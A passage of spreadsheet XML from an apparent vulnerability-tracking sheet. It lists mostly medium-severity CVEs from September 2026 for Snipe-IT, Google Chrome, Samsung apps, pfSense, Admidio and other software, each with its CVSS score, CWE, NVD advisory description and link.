      <c r="D1033" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E1033" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1033" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G1033" s="5" t="inlineStr"/>
      <c r="H1033" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1033" s="5" t="inlineStr"/>
      <c r="J1033" s="5" t="inlineStr"/>
      <c r="K1033" s="5" t="inlineStr">
        <is>
          <t>snipeitapp:snipe-it</t>
        </is>
      </c>
      <c r="L1033" s="5" t="inlineStr"/>
      <c r="M1033" s="5" t="inlineStr"/>
      <c r="N1033" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1033" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P1033" s="5" t="inlineStr"/>
      <c r="Q1033" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="R1033" s="5" t="inlineStr">
        <is>
          <t>Snipe-IT through version 8.6.3 fails to perform object-level authorization in the updateLicense, updateConsumable, updateAccessory, and updateModel endpoints and in the storeModel endpoint for Predefined Kits. The existing check authorizes only the parent Predefined Kit (update on PredefinedKit) and not the child object being attached. As a result, an authenticated user holding only the kits.edit permission can attach a License, Consumable, Accessory, or Asset Model that they are otherwise denied (HTTP 403) from reading directly to a Predefined Kit, and the kit relation index then discloses the attached object's name back to that low-privilege user. This is the update-path and storeModel counterpart to CVE-2026-55478, which fixed only the storeLicense, storeConsumable, and storeAccessory methods in 8.6.2. Note that updateModel was code-vulnerable in 8.6.3 but not reachable in practice because a route-name typo bound the route to a nonexistent controller method, causing HTTP 500 responses. The issue is fixed in Snipe-IT 8.7.0.</t>
        </is>
      </c>
      <c r="S1033" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86773</t>
        </is>
      </c>
    </row>
    <row r="1034">
      <c r="A1034" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1034" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1034" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87435</t>
        </is>
      </c>
      <c r="D1034" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E1034" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1034" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G1034" s="5" t="inlineStr"/>
      <c r="H1034" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1034" s="5" t="inlineStr"/>
      <c r="J1034" s="5" t="inlineStr"/>
      <c r="K1034" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="L1034" s="5" t="inlineStr"/>
      <c r="M1034" s="5" t="inlineStr"/>
      <c r="N1034" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1034" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P1034" s="5" t="inlineStr"/>
      <c r="Q1034" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="R1034" s="5" t="inlineStr">
        <is>
          <t>Information leak in ControlledFrame in Google Chrome prior to 153.0.8010.36 allowed a remote attacker who had compromised the renderer process to obtain sensitive information via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="S1034" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87435</t>
        </is>
      </c>
    </row>
    <row r="1035">
      <c r="A1035" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1035" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1035" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87439</t>
        </is>
      </c>
      <c r="D1035" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E1035" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1035" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G1035" s="5" t="inlineStr"/>
      <c r="H1035" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1035" s="5" t="inlineStr"/>
      <c r="J1035" s="5" t="inlineStr"/>
      <c r="K1035" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="L1035" s="5" t="inlineStr"/>
      <c r="M1035" s="5" t="inlineStr"/>
      <c r="N1035" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1035" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P1035" s="5" t="inlineStr"/>
      <c r="Q1035" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="R1035" s="5" t="inlineStr">
        <is>
          <t>Information leak in ServiceWorker in Google Chrome prior to 153.0.8010.36 allowed a remote attacker who had compromised the renderer process to obtain sensitive information via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="S1035" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87439</t>
        </is>
      </c>
    </row>
    <row r="1036">
      <c r="A1036" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1036" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1036" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87453</t>
        </is>
      </c>
      <c r="D1036" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E1036" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1036" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G1036" s="5" t="inlineStr"/>
      <c r="H1036" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1036" s="5" t="inlineStr"/>
      <c r="J1036" s="5" t="inlineStr"/>
      <c r="K1036" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="L1036" s="5" t="inlineStr"/>
      <c r="M1036" s="5" t="inlineStr"/>
      <c r="N1036" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1036" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P1036" s="5" t="inlineStr"/>
      <c r="Q1036" s="5" t="inlineStr">
        <is>
          <t>CWE-441</t>
        </is>
      </c>
      <c r="R1036" s="5" t="inlineStr">
        <is>
          <t>Confused deputy in BackgroundFetch in Google Chrome prior to 153.0.8010.36 allowed a remote attacker who had compromised the renderer process to leak sensitive information via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="S1036" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87453</t>
        </is>
      </c>
    </row>
    <row r="1037">
      <c r="A1037" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1037" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1037" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87518</t>
        </is>
      </c>
      <c r="D1037" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E1037" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1037" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G1037" s="5" t="inlineStr"/>
      <c r="H1037" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1037" s="5" t="inlineStr"/>
      <c r="J1037" s="5" t="inlineStr"/>
      <c r="K1037" s="5" t="inlineStr">
        <is>
          <t>apple:iphone_os, google:chrome</t>
        </is>
      </c>
      <c r="L1037" s="5" t="inlineStr"/>
      <c r="M1037" s="5" t="inlineStr"/>
      <c r="N1037" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1037" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P1037" s="5" t="inlineStr"/>
      <c r="Q1037" s="5" t="inlineStr">
        <is>
          <t>CWE-203</t>
        </is>
      </c>
      <c r="R1037" s="5" t="inlineStr">
        <is>
          <t>Observable discrepancy in Safebrowsing in Google Chrome on on iOS prior to 153.0.8010.36 allowed a remote attacker who had compromised the renderer process to potentially obtain sensitive information via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="S1037" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87518</t>
        </is>
      </c>
    </row>
    <row r="1038">
      <c r="A1038" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1038" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1038" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87523</t>
        </is>
      </c>
      <c r="D1038" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E1038" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1038" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G1038" s="5" t="inlineStr"/>
      <c r="H1038" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1038" s="5" t="inlineStr"/>
      <c r="J1038" s="5" t="inlineStr"/>
      <c r="K1038" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="L1038" s="5" t="inlineStr"/>
      <c r="M1038" s="5" t="inlineStr"/>
      <c r="N1038" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1038" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P1038" s="5" t="inlineStr"/>
      <c r="Q1038" s="5" t="inlineStr">
        <is>
          <t>CWE-367</t>
        </is>
      </c>
      <c r="R1038" s="5" t="inlineStr">
        <is>
          <t>Race condition in DataTransfer in Google Chrome prior to 153.0.8010.36 allowed a remote attacker leveraging social engineering to obtain sensitive information via a crafted HTML page. (Chromium security severity: Low)</t>
        </is>
      </c>
      <c r="S1038" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87523</t>
        </is>
      </c>
    </row>
    <row r="1039">
      <c r="A1039" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1039" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1039" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87566</t>
        </is>
      </c>
      <c r="D1039" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E1039" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1039" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G1039" s="5" t="inlineStr"/>
      <c r="H1039" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1039" s="5" t="inlineStr"/>
      <c r="J1039" s="5" t="inlineStr"/>
      <c r="K1039" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="L1039" s="5" t="inlineStr"/>
      <c r="M1039" s="5" t="inlineStr"/>
      <c r="N1039" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1039" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P1039" s="5" t="inlineStr"/>
      <c r="Q1039" s="5" t="inlineStr">
        <is>
          <t>CWE-203</t>
        </is>
      </c>
      <c r="R1039" s="5" t="inlineStr">
        <is>
          <t>Observable discrepancy in Layout in Google Chrome prior to 153.0.8010.36 allowed a remote attacker to leak sensitive information via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="S1039" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87566</t>
        </is>
      </c>
    </row>
    <row r="1040">
      <c r="A1040" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1040" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1040" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87594</t>
        </is>
      </c>
      <c r="D1040" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E1040" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1040" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G1040" s="5" t="inlineStr"/>
      <c r="H1040" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1040" s="5" t="inlineStr"/>
      <c r="J1040" s="5" t="inlineStr"/>
      <c r="K1040" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="L1040" s="5" t="inlineStr"/>
      <c r="M1040" s="5" t="inlineStr"/>
      <c r="N1040" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1040" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P1040" s="5" t="inlineStr"/>
      <c r="Q1040" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="R1040" s="5" t="inlineStr">
        <is>
          <t>Incorrect authorization in DataTransfer in Google Chrome prior to 153.0.8010.36 allowed a remote attacker who had compromised the renderer process to obtain sensitive information via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="S1040" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87594</t>
        </is>
      </c>
    </row>
    <row r="1041">
      <c r="A1041" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1041" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1041" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87605</t>
        </is>
      </c>
      <c r="D1041" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E1041" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1041" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G1041" s="5" t="inlineStr"/>
      <c r="H1041" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1041" s="5" t="inlineStr"/>
      <c r="J1041" s="5" t="inlineStr"/>
      <c r="K1041" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="L1041" s="5" t="inlineStr"/>
      <c r="M1041" s="5" t="inlineStr"/>
      <c r="N1041" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1041" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P1041" s="5" t="inlineStr"/>
      <c r="Q1041" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R1041" s="5" t="inlineStr">
        <is>
          <t>Missing authorization in Contacts in Google Chrome prior to 153.0.8010.36 allowed a remote attacker who had compromised the renderer process and leveraged social engineering to potentially obtain sensitive information via a crafted HTML page. (Chromium security severity: Low)</t>
        </is>
      </c>
      <c r="S1041" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87605</t>
        </is>
      </c>
    </row>
    <row r="1042">
      <c r="A1042" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1042" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1042" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-7062</t>
        </is>
      </c>
      <c r="D1042" s="5" t="n">
        <v>5.2</v>
      </c>
      <c r="E1042" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1042" s="5" t="inlineStr">
        <is>
          <t>23637b5d-af4c-4cf9-b8f6-deb7fd0f8423</t>
        </is>
      </c>
      <c r="G1042" s="5" t="inlineStr"/>
      <c r="H1042" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1042" s="5" t="inlineStr"/>
      <c r="J1042" s="5" t="inlineStr"/>
      <c r="K1042" s="5" t="inlineStr"/>
      <c r="L1042" s="5" t="inlineStr"/>
      <c r="M1042" s="5" t="inlineStr"/>
      <c r="N1042" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1042" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P1042" s="5" t="inlineStr"/>
      <c r="Q1042" s="5" t="inlineStr">
        <is>
          <t>CWE-20, CWE-79</t>
        </is>
      </c>
      <c r="R1042" s="5" t="inlineStr">
        <is>
          <t>A stored cross-site scripting (XSS) vulnerability has been identified in the H5P module `h5p-nodejs-library` by Lumi Education UG in versions up to and including 10.0.4. The library allows users to upload H5P content that contains malicious JavaScript. This code is then executed in the browsers of other users who view the affected H5P content.</t>
        </is>
      </c>
      <c r="S1042" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-7062</t>
        </is>
      </c>
    </row>
    <row r="1043">
      <c r="A1043" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1043" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1043" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53760</t>
        </is>
      </c>
      <c r="D1043" s="5" t="n">
        <v>5.2</v>
      </c>
      <c r="E1043" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1043" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G1043" s="5" t="inlineStr"/>
      <c r="H1043" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I1043" s="5" t="inlineStr"/>
      <c r="J1043" s="5" t="inlineStr"/>
      <c r="K1043" s="5" t="inlineStr"/>
      <c r="L1043" s="5" t="inlineStr"/>
      <c r="M1043" s="5" t="inlineStr"/>
      <c r="N1043" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1043" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="P1043" s="5" t="inlineStr"/>
      <c r="Q1043" s="5" t="inlineStr">
        <is>
          <t>CWE-352</t>
        </is>
      </c>
      <c r="R1043" s="5" t="inlineStr">
        <is>
          <t>Admidio is an open-source user management solution. In versions 5.0.11 and prior, the modules/plugins.php endpoint handles plugin installation, uninstallation, and update operations via GET requests without CSRF token validation. Because these are top-level navigations, browsers include SameSite=Lax session cookies. An attacker crafts a malicious page that, when an authenticated administrator visits it, triggers arbitrary plugin operations. The uninstall operation executes DROP TABLE SQL scripts and destroys plugin data. This issue has been patched via commit 056b1bd.</t>
        </is>
      </c>
      <c r="S1043" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53760</t>
        </is>
      </c>
    </row>
    <row r="1044">
      <c r="A1044" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1044" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1044" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-21106</t>
        </is>
      </c>
      <c r="D1044" s="5" t="n">
        <v>5.1</v>
      </c>
      <c r="E1044" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1044" s="5" t="inlineStr">
        <is>
          <t>mobile.security@samsung.com</t>
        </is>
      </c>
      <c r="G1044" s="5" t="inlineStr"/>
      <c r="H1044" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I1044" s="5" t="inlineStr"/>
      <c r="J1044" s="5" t="inlineStr"/>
      <c r="K1044" s="5" t="inlineStr"/>
      <c r="L1044" s="5" t="inlineStr"/>
      <c r="M1044" s="5" t="inlineStr"/>
      <c r="N1044" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1044" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P1044" s="5" t="inlineStr"/>
      <c r="Q1044" s="5" t="inlineStr">
        <is>
          <t>CWE-925</t>
        </is>
      </c>
      <c r="R1044" s="5" t="inlineStr">
        <is>
          <t>Improper verification of intent by broadcast receiver in Samsung Cloud Assistant prior to version 9.0.5 allows local attackers to disable enhanced data protection settings.</t>
        </is>
      </c>
      <c r="S1044" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-21106</t>
        </is>
      </c>
    </row>
    <row r="1045">
      <c r="A1045" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1045" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1045" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-21112</t>
        </is>
      </c>
      <c r="D1045" s="5" t="n">
        <v>5.1</v>
      </c>
      <c r="E1045" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1045" s="5" t="inlineStr">
        <is>
          <t>mobile.security@samsung.com</t>
        </is>
      </c>
      <c r="G1045" s="5" t="inlineStr"/>
      <c r="H1045" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I1045" s="5" t="inlineStr"/>
      <c r="J1045" s="5" t="inlineStr"/>
      <c r="K1045" s="5" t="inlineStr"/>
      <c r="L1045" s="5" t="inlineStr"/>
      <c r="M1045" s="5" t="inlineStr"/>
      <c r="N1045" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1045" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P1045" s="5" t="inlineStr"/>
      <c r="Q1045" s="5" t="inlineStr">
        <is>
          <t>CWE-20</t>
        </is>
      </c>
      <c r="R1045" s="5" t="inlineStr">
        <is>
          <t>Improper input validation in Samsung Tips prior to Android 17 allows local attackers to launch arbitrary activity with Samsung Tips privilege. User interaction is required for triggering this vulnerability.</t>
        </is>
      </c>
      <c r="S1045" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-21112</t>
        </is>
      </c>
    </row>
    <row r="1046">
      <c r="A1046" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1046" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1046" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53720</t>
        </is>
      </c>
      <c r="D1046" s="5" t="n">
        <v>5.1</v>
      </c>
      <c r="E1046" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1046" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G1046" s="5" t="inlineStr"/>
      <c r="H1046" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I1046" s="5" t="inlineStr"/>
      <c r="J1046" s="5" t="inlineStr"/>
      <c r="K1046" s="5" t="inlineStr"/>
      <c r="L1046" s="5" t="inlineStr"/>
      <c r="M1046" s="5" t="inlineStr"/>
      <c r="N1046" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1046" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="P1046" s="5" t="inlineStr"/>
      <c r="Q1046" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-1284, CWE-787</t>
        </is>
      </c>
      <c r="R1046" s="5" t="inlineStr">
        <is>
          <t>pymonocypher uses cython to wrap the Monocypher C library. Prior to version 4.0.2.8, the argon2i_32 implementation does not check the nb_blocks size. If the caller does not provide a sufficiently large buffer based on the API contract, then argon2i_32 will write past the end of the buffer and possibly corrupt the heap. This issue has been patched in version 4.0.2.8.</t>
        </is>
      </c>
      <c r="S1046" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53720</t>
        </is>
      </c>
    </row>
    <row r="1047">
      <c r="A1047" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1047" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1047" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-56126</t>
        </is>
      </c>
      <c r="D1047" s="5" t="n">
        <v>5.1</v>
      </c>
      <c r="E1047" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1047" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G1047" s="5" t="inlineStr"/>
      <c r="H1047" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I1047" s="5" t="inlineStr"/>
      <c r="J1047" s="5" t="inlineStr"/>
      <c r="K1047" s="5" t="inlineStr"/>
      <c r="L1047" s="5" t="inlineStr"/>
      <c r="M1047" s="5" t="inlineStr"/>
      <c r="N1047" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1047" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="P1047" s="5" t="inlineStr"/>
      <c r="Q1047" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R1047" s="5" t="inlineStr">
        <is>
          <t>pfSense Plus before 26.07 and CE before 2.9.0 allow authenticated users with the Status: Monitoring privilege to inject arbitrary JavaScript via graph configuration parameters in /status_monitoring.php. Multiple POST parameters including graph-left, graph-right, time-period, resolution, start-date, end-date, start-time, end-time, graph-type, invert, and refresh-interval are concatenated and written to the global pfSense XML configuration without sanitization, then echoed unsanitized into a JavaScript string context on page render. Because the setting is stored in the global configuration, the payload executes in the browser of every user who visits the Status: Monitoring page.</t>
        </is>
      </c>
      <c r="S1047" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-56126</t>
        </is>
      </c>
    </row>
    <row r="1048">
      <c r="A1048" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1048" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1048" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-56128</t>
        </is>
      </c>
      <c r="D1048" s="5" t="n">
        <v>5.1</v>
      </c>
      <c r="E1048" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1048" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G1048" s="5" t="inlineStr"/>
      <c r="H1048" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I1048" s="5" t="inlineStr"/>
      <c r="J1048" s="5" t="inlineStr"/>
      <c r="K1048" s="5" t="inlineStr"/>
      <c r="L1048" s="5" t="inlineStr"/>
      <c r="M1048" s="5" t="inlineStr"/>
      <c r="N1048" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1048" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="P1048" s="5" t="inlineStr"/>
      <c r="Q1048" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R1048" s="5" t="inlineStr">
        <is>
          <t>pfSense Plus before 26.07 and CE before 2.9.0 allow authenticated users with the Firewall: Schedules: Edit privilege to inject arbitrary JavaScript via the descr parameter in /firewall_schedule_edit.php. The schedule description is stored without HTML sanitization and subsequently inserted into an HTML attribute value in /firewall_rules.php with only single-quote escaping applied, permitting double-quote breakout. The payload executes in the browser of any user with the Firewall: Rules privilege who views the rules list with the affected schedule attached.</t>
        </is>
      </c>
      <c r="S1048" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-56128</t>
        </is>
      </c>
    </row>
    <row r="1049">
      <c r="A1049" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1049" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1049" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81887</t>
        </is>
      </c>
      <c r="D1049" s="5" t="n">
        <v>5.1</v>
      </c>
      <c r="E1049" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
